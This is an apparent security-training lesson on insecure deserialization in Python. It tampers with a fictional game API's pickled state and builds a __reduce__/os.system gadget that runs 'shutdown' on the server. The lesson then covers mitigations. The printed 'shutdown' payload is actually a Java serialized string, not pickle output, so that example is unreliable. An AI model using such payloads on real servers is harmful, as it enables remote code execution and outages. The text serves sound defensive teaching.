Insecure deserialization
Improper handling of serialized data containing user input
~20 mins estimated
What is insecure deserialization?
Serialization is a mechanism for transforming application data into a format suitable for transport: a byte stream. Deserialization is the opposite process, converting a byte stream back into application data. Insecure deserialization is a vulnerability that occurs when attacker-controlled data is deserialized by the server. In the worst case, it can lead to remote code execution.
About this lesson
In this lesson, we will demonstrate an insecure deserialization attack by hacking an API of a video game company. Then, we will dive deeper into Python deserialization, explain the concept of a gadget, and study vulnerable Python code. Finally, we will cover how to mitigate this vulnerability.
But first, let's hack a video game!
Hacking a web game
"Dungeons and Money" is here! Your long-time favorite game developer, GreedAndCo, has finally finished the multiplayer online game you have been waiting for since childhood. It's 11:59pm, and you have been furiously restarting the game, hoping for the login screen to appear.
The clock strikes midnight. With excitement at its peak, you press the login button and finally start playing. But something is not right: even a level 1 rabbit is life-threatening. The game relies on microtransactions! You have to pay $10.99 for an epic sword if you want to kill rabbits. You can't believe this. You've already paid big money for the game. Oh well, it's time to put your hacker's hat on and fix this injustice!
Wow, this sword really is tiny. But I'm not paying to upgrade. Let's take a look at the terminal below and see if we can make some modifications.
Understanding the API
You start by sniffing the network traffic the game sends from your machine while you play. A few minutes later, you notice that the game client does an HTTP POST to https://api.dungeonsandmoney.com/state/147983414 with the following payload:
{ "equipment": "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4=", "location": "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LC", ... }
Maybe these long strings are base64 encoded? Let's take the equipment value and verify that! Run:
echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode
Deserializing Python objects
The output might look complex, but the string is just a base64-encoded representation of a serialized Python object. To understand its contents, we first need to decode the base64 string and then deserialize the result. We can decode the base64 string to a file called equip.pkl by running:
echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode > equip.pkl
Deserializing Python objects to a human-readable format
We will be deserializing objects into a human-readable format using the following script:
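The script itself is not reproduced here, so what follows is only a minimal sketch of what it might look like. It decodes the captured value inline rather than reading equip.pkl, and it assumes (from inspecting this particular payload) that the pickle wraps a single JSON string. The names `EQUIPMENT_B64` and `inspect_state` are made up for illustration.

```python
import base64
import json
import pickle

# The "equipment" value captured from the game's POST request.
EQUIPMENT_B64 = "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4="


def inspect_state(encoded: str) -> dict:
    """Base64-decode, unpickle, and JSON-parse one state value."""
    raw = base64.b64decode(encoded)  # the same bytes we wrote to equip.pkl
    text = pickle.loads(raw)         # assumption: the pickle holds one JSON string
    return json.loads(text)


state = inspect_state(EQUIPMENT_B64)
print(json.dumps(state, indent=2))
```

We only call `pickle.loads()` here because the bytes came from our own game client. Unpickling data of unknown origin is exactly the risk this lesson is about.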
Changing the game state
Excellent! The serialized object represents the Equipment class. Upon closer inspection, you'll see it possesses an items field. The values of the items array are [0, 0, 1, 0, 0].
Your in-game character currently has only one item equipped: a level 1 sword. What do you think will happen if we change the array to [0, 0, 20, 0, 0]? Replacing the 1 (the level 1 sword) with 20 should turn it into a level 20 sword and make our character far more capable.
Here are the steps:
- Modify the items array from [0, 0, 1, 0, 0] to [0, 0, 20, 0, 0] within the deserialized Python object.
- Serialize the modified Python object.
- Convert the serialized data to a base64 encoded string for transmission or storage.
We will serialize and base64 encode the Python object to prepare it for sending to the game API using the following script:
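The script is not reproduced here, so the following is a sketch of the three steps rather than the lesson's exact code. It assumes the state is a JSON string wrapped in a pickle, and it picks pickle protocol 4 because that is what the first bytes of the captured payload indicate. `ORIGINAL_B64` and `upgrade_sword` are hypothetical names.

```python
import base64
import json
import pickle

# The original "equipment" value captured from the game client.
ORIGINAL_B64 = "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4="


def upgrade_sword(encoded: str, level: int) -> str:
    """Return a new base64 payload with the sword slot set to `level`."""
    # Deserialize: base64 -> pickle -> JSON string -> dict
    state = json.loads(pickle.loads(base64.b64decode(encoded)))

    # Step 1: modify the items array (the sword sits at index 2).
    state["fields"]["items"][2] = level

    # Step 2: serialize again (assumption: the server expects protocol 4).
    tampered = pickle.dumps(json.dumps(state), protocol=4)

    # Step 3: base64-encode for transport.
    return base64.b64encode(tampered).decode("ascii")


payload = upgrade_sword(ORIGINAL_B64, 20)
print(payload)
```

Decoding the result again is a quick way to confirm that the items array now reads [0, 0, 20, 0, 0] before sending anything to the API.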
After serializing and base64 encoding we get the following output:
gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu
Now we can attach this payload to the API POST request.
curl -H "Content-Type: application/json" -X POST -d '{ "equipment":"gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu" }' https://api.dungeonsandmoney.com/state/147983414
Remote code execution
You log into the game, and boom! Your level 1 sword just got upgraded to level 20. By manipulating serialized data, you managed to change the state of the game.
Now things are looking better! We can take on almost any enemy that comes our way. But can we take this one step further?
Observe the following code:
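The listing is not reproduced here. A minimal sketch that matches the explanation could look like the following; it swaps in a harmless `echo` as the "specific command" so it is safe to run locally.

```python
import os
import pickle


class EvilClass:
    """An object whose pickled form runs a shell command when it is loaded."""

    def __reduce__(self):
        # Instead of the object's attributes, pickle records
        # "call os.system with this argument tuple".
        # Assumption: a harmless echo stands in for a real attack command.
        return (os.system, ("echo code ran during unpickling",))


evil_instance = EvilClass()
evil_payload = pickle.dumps(evil_instance)

# Loading the bytes calls os.system(...). The value we get back is the
# command's exit status, not an EvilClass instance.
result = pickle.loads(evil_payload)
```

Note that the side effect happens inside `pickle.loads()` itself, before the receiving code has any chance to inspect what was deserialized.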
Explanation:
- EvilClass is defined with a special method __reduce__
- __reduce__ returns a tuple to run os.system with a specific command
- An instance of EvilClass is created as evil_instance
- evil_instance is serialized using pickle.dumps()
- Deserializing evil_payload using pickle.loads() executes the malicious command
You prepare the code below to generate a serialized, base64 encoded payload that will run the "shutdown" command when executed:
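The code is not reproduced here, so this is a sketch under assumptions rather than the lesson's exact script. The constructor argument and the `build_payload` helper are hypothetical. Nothing is executed locally, because the object is only serialized and never loaded.

```python
import base64
import os
import pickle


class EvilClass:
    """Carries a shell command that runs when the pickle is loaded."""

    def __init__(self, command: str):
        self.command = command

    def __reduce__(self):
        # Tell pickle to rebuild this object by calling os.system(command).
        return (os.system, (self.command,))


def build_payload(command: str) -> str:
    """Serialize an EvilClass instance and base64-encode the result."""
    serialized = pickle.dumps(EvilClass(command))
    return base64.b64encode(serialized).decode("ascii")


payload = build_payload("shutdown")
print(payload)
```

The exact base64 string depends on the platform (os.system is recorded under the operating system's module name) and on the pickle protocol in use, so the output can differ between machines.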
We should get:
rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=
Now when we run the following, our game will change again:
curl -H "Content-Type: application/json" -X POST -d '{ "equipment": "rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=" }' https://api.dungeonsandmoney.com/state/147983414
Boom! Your game client crashes, and a gigantic red "Server is down" alert pops up on your screen. The shutdown command must have worked! But how?
State manipulation: a false sense of security
In the previous section, we saw how insecure deserialization can lead to state manipulation and remote code execution. State manipulation can happen whether or not serialization is used. However, because serialized payloads look more "obscure", developers tend to assume that serialization somehow protects them against this kind of attack.
In reality, it makes no difference whether a payload is a seemingly cryptic base64 encoded string or a straightforward JSON object: if a malicious actor can influence its contents, the integrity of the application is at risk. Rather than relying on obscurity, ensure that any data coming from untrusted sources, serialized or not, is validated and sanitized. If the client can unexpectedly manipulate the state, that is a clear sign the API needs a more secure design.
Remote code execution
In the worst case, deserialization vulnerabilities can lead to remote code execution. Let's look at the EvilClass class we used in the previous exercise.
Explanation
The __reduce__ method defines custom behavior during pickling. It returns a tuple whose first item is a callable (in this case, os.system) and whose second item is a tuple of arguments for that callable.
When a serialized EvilClass instance is deserialized using pickle.loads(), pickle calls the callable with the specified arguments, executing the malicious command.
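To see what __reduce__ actually puts on the wire, we can disassemble a payload with the standard library's pickletools module, which parses the opcodes without executing them. This is a sketch for illustration; the class is redefined with a harmless `echo` command so the block is self-contained.

```python
import os
import pickle
import pickletools


class EvilClass:
    def __reduce__(self):
        # Assumption: a harmless command used only for illustration.
        return (os.system, ("echo hello",))


evil_payload = pickle.dumps(EvilClass(), protocol=4)

# genops() walks the opcode stream without running anything.
opcodes = [op.name for op, arg, pos in pickletools.genops(evil_payload)]
print(opcodes)

# dis() prints a human-readable listing of the same stream.
pickletools.dis(evil_payload)
```

In the listing, STACK_GLOBAL pushes the callable onto the stack and REDUCE calls it with the argument tuple. That call is the step that turns loading data into running code.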
Other serialization frameworks
Pickle
As already discussed, Python's built-in pickle module is well-known for its insecure deserialization vulnerabilities. It allows serialization and deserialization of arbitrary Python objects, leading to the potential for arbitrary code execution if a malicious payload is processed.
PyYAML
The PyYAML library is used to parse YAML documents into Python objects. In older versions of the library, the yaml.load() method was vulnerable to arbitrary code execution through crafted YAML payloads. Using the yaml.safe_load() method instead is recommended as it limits deserialization to basic Python objects.
JSON Libraries
JSON libraries in Python are generally safe from deserialization attacks because JSON does not support complex types and functions. Instead, it deals with simple data structures. However, always validate the structure of the incoming data to prevent potential issues related to unexpected data types or structures.
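As an illustration of validating structure after parsing, here is a sketch that accepts an equipment payload as plain JSON. The field name, the five-slot layout, and the level cap are assumptions borrowed from the game example, and `parse_equipment` is a hypothetical helper.

```python
import json

EXPECTED_SLOTS = 5  # assumption: the items array always has five slots
MAX_LEVEL = 20      # assumption: the highest item level the game allows


def parse_equipment(body: str) -> list[int]:
    """Parse a JSON body and return a validated items list, or raise ValueError."""
    data = json.loads(body)  # raises json.JSONDecodeError (a ValueError) on bad input
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")

    items = data.get("items")
    if not isinstance(items, list) or len(items) != EXPECTED_SLOTS:
        raise ValueError("items must be a list with exactly five entries")

    for level in items:
        # bool is a subclass of int in Python, so reject it explicitly.
        if isinstance(level, bool) or not isinstance(level, int):
            raise ValueError("item levels must be integers")
        if not 0 <= level <= MAX_LEVEL:
            raise ValueError("item level out of range")
    return items


print(parse_equipment('{"items": [0, 0, 1, 0, 0]}'))
```

Shape validation like this stops malformed input, but it does not decide whether the player is entitled to a level 20 sword. That check has to be made against state the server owns.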
Don't deserialize untrusted data
The golden rule for avoiding insecure deserialization issues is to never deserialize data that originates from an untrusted source, such as user input.
Opt for simpler data structures
Deserialization of complex data structures from untrusted sources is inherently unsafe, as it can result in arbitrary code execution. Whenever possible, opt for simpler serialization formats like JSON, which does not support deserializing into arbitrary objects with complex types and functions.
Use safer function alternatives
In older versions of PyYAML, the default yaml.load() could construct arbitrary Python objects, which poses security risks. yaml.safe_load() only constructs simple Python data structures such as lists and dictionaries.
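A short sketch of the difference, assuming the third-party PyYAML package is installed. The document in `UNTRUSTED` uses a Python-specific tag that an unsafe loader would act on, and `load_untrusted_yaml` is a hypothetical wrapper.

```python
import yaml  # third-party package: PyYAML

# A document that asks the loader to call os.system.
UNTRUSTED = '!!python/object/apply:os.system ["echo pwned"]'


def load_untrusted_yaml(text: str):
    """Parse YAML with the safe loader; reject anything it cannot construct."""
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:
        # The safe loader has no constructor for python/* tags, so it
        # raises instead of running code.
        raise ValueError(f"rejected YAML document: {exc}") from exc


print(load_untrusted_yaml("items: [0, 0, 1, 0, 0]"))

try:
    load_untrusted_yaml(UNTRUSTED)
except ValueError as exc:
    print("blocked:", exc)
```

Plain mappings and lists load as usual, while the tagged document is refused before any Python object is constructed from it.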
Keep learning
To learn more about Insecure Deserialization, check out some other great content:
- The original research on deserialization vulnerabilities by Gabriel Lawrence and Chris Frohoff
- A great blog post on how to exploit insecure deserialization in different Java server-side technologies by Stephen Breen
- A blog post by the maintainer of Jackson which details exploitability conditions for insecure deserialization in Jackson
- A detailed analysis of insecure deserialization in different Java serialization libraries by Moritz Bechler
- Security implications of the pickle module
- A blog post about an insecure deserialization attack in a Python application
- Another post about insecure deserialization in Python
And some content by Snyk:
- Our blog post on new serialization features introduced in Java 17
- Our earlier blog post which covers a lot of topics covered in this lesson
- Our blog post on deserialization problems with Jackson's ObjectMapper